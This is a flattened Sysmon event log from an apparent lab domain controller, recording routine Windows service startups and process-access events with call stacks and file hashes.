08:41:21.953{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001154Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:21.952{5D479F2C-169F-5F84-0A00-000000007F01}8561264C:\Windows\system32\services.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001153Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:21.944{5D479F2C-169F-5F84-0A00-000000007F01}8561132C:\Windows\system32\services.exe{5D479F2C-16B1-5F84-3200-000000007F01}2696C:\Windows\system32\dfssvc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001152Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:21.943{5D479F2C-169F-5F84-0500-000000007F01}6482424C:\Windows\system32\csrss.exe{5D479F2C-16B1-5F84-2D00-000000007F01}2504C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000001151Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:21.942{5D479F2C-169F-5F84-0A00-000000007F01}856916C:\Windows\system32\services.exe{5D479F2C-16B1-5F84-2D00-000000007F01}2504C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d608|C:\Windows\system32\services.exe+20a11|C:\Windows\SYSTEM32\ntdll.dll+2b9ae|C:\Windows\SYSTEM32\ntdll.dll+29bc4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000001150Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:21.894{5D479F2C-16B1-5F84-2D00-000000007F01}2504C:\Windows\System32\dfsrs.exe10.0.14393.2879 (rs1_release_inmarket.190313-1855)Distributed File System ReplicationMicrosoft® Windows® Operating SystemMicrosoft Corporationdfsr.exeC:\Windows\system32\DFSRs.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{5D479F2C-169F-5F84-E703-000000000000}0x3e70SystemMD5=5043D2DBA1E5AC37A9874B403B48C1C1,SHA256=7044CE273B245F6D67A3BFC7D548CFF538F8FC3BD1C99467B5ADE6452C150313,IMPHASH=C1481566D7D03EEC4CC460B52429BA9C{5D479F2C-169F-5F84-0A00-000000007F01}856C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001149Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:21.939{5D479F2C-169F-5F84-0500-000000007F01}6482424C:\Windows\system32\csrss.exe{5D479F2C-16A2-5F84-1A00-000000007F01}2212C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000001148Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:21.939{5D479F2C-169F-5F84-0A00-000000007F01}856940C:\Windows\system32\services.exe{5D479F2C-16A2-5F84-1A00-000000007F01}2212C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d608|C:\Windows\system32\services.exe+20a11|C:\Windows\SYSTEM32\ntdll.dll+2b9ae|C:\Windows\SYSTEM32\ntdll.dll+29bc4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000001147Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:21.907{5D479F2C-16B1-5F84-3100-000000007F01}2212C:\Windows\System32\dns.exe10.0.14393.3930 (rs1_release.200901-1914)Domain Name System (DNS) ServerMicrosoft® Windows® Operating SystemMicrosoft Corporationdns.exeC:\Windows\system32\dns.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{5D479F2C-169F-5F84-E703-000000000000}0x3e70SystemMD5=9D6D2A8F016923E865F944F5505CAFE6,SHA256=B48220FB5B78641ACF5566E798374E9C51FED61CE0559843364E7BD664C30864,IMPHASH=F11D7ACAC98040FCC69808598F92C5FA{5D479F2C-169F-5F84-0A00-000000007F01}856C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001146Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:21.938{5D479F2C-169F-5F84-0500-000000007F01}6481156C:\Windows\system32\csrss.exe{5D479F2C-16B1-5F84-3200-000000007F01}2696C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000001145Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:21.938{5D479F2C-169F-5F84-0A00-000000007F01}8561264C:\Windows\system32\services.exe{5D479F2C-16B1-5F84-3200-000000007F01}2696C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d608|C:\Windows\system32\services.exe+20a11|C:\Windows\SYSTEM32\ntdll.dll+2b9ae|C:\Windows\SYSTEM32\ntdll.dll+29bc4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000001144Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:21.928{5D479F2C-16B1-5F84-3200-000000007F01}2696C:\Windows\System32\dfssvc.exe10.0.14393.0 (rs1_release.160715-1616)Windows NT Distributed File System ServiceMicrosoft® Windows® Operating SystemMicrosoft Corporationdfssvc.exeC:\Windows\system32\dfssvc.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{5D479F2C-169F-5F84-E703-000000000000}0x3e70SystemMD5=304155A24E5273CF68197B30112D451A,SHA256=EC48F117C47F0E4BD5F7407629CE8CF78579764A7947CA05EDC089B59B941576,IMPHASH=C8B32AEEF22A97D88BD68D70385A1B30{5D479F2C-169F-5F84-0A00-000000007F01}856C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001143Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:21.926{5D479F2C-169F-5F84-0B00-000000007F01}864912C:\Windows\system32\lsass.exe{5D479F2C-16B1-5F84-2B00-000000007F01}2904C:\Windows\System32\ismserv.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001142Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:21.926{5D479F2C-169F-5F84-0B00-000000007F01}864912C:\Windows\system32\lsass.exe{5D479F2C-16B1-5F84-2B00-000000007F01}2904C:\Windows\System32\ismserv.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001141Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:21.925{5D479F2C-169F-5F84-0500-000000007F01}648796C:\Windows\system32\csrss.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000001140Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:21.925{5D479F2C-169F-5F84-0A00-000000007F01}8562576C:\Windows\system32\services.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\services.exe+12bee|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d608|C:\Windows\system32\services.exe+20a11|C:\Windows\SYSTEM32\ntdll.dll+2b9ae|C:\Windows\SYSTEM32\ntdll.dll+29bc4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000001139Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:21.893{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe12.0System activity monitorSysinternals SysmonSysinternals - www.sysinternals.com-C:\Windows\sysmon64.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{5D479F2C-169F-5F84-E703-000000000000}0x3e70SystemMD5=0475D48604B7C8E7D9DD7605B6A5930F,SHA256=55BAD23D049A2FD801B8DECDC5D960D4E27D7F92541E8B37557B7495CA5561A2,IMPHASH=49AAA307415968B34D3FD1A72DEE6C71{5D479F2C-169F-5F84-0A00-000000007F01}856C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001138Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:21.924{5D479F2C-169F-5F84-0B00-000000007F01}864912C:\Windows\system32\lsass.exe{5D479F2C-169F-5F84-0A00-000000007F01}856C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001137Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:21.924{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-169F-5F84-0B00-000000007F01}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001136Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:21.924{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-169F-5F84-0B00-000000007F01}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001135Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:21.924{5D479F2C-169F-5F84-0B00-000000007F01}864912C:\Windows\system32\lsass.exe{5D479F2C-169F-5F84-0A00-000000007F01}856C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001134Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:21.923{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-169F-5F84-0B00-000000007F01}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001133Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:21.923{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-169F-5F84-0B00-000000007F01}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001132Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:21.923{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-169F-5F84-0B00-000000007F01}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001131Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:21.911{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-169F-5F84-0B00-000000007F01}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001130Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:21.910{5D479F2C-169F-5F84-0A00-000000007F01}8561152C:\Windows\system32\services.exe{5D479F2C-16A2-5F84-2100-000000007F01}2444C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001129Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:21.910{5D479F2C-169F-5F84-0A00-000000007F01}8562572C:\Windows\system32\services.exe{5D479F2C-16B1-5F84-2F00-000000007F01}2892C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001128Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:21.910{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-169F-5F84-0B00-000000007F01}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001127Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:21.910{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-169F-5F84-0B00-000000007F01}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001126Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 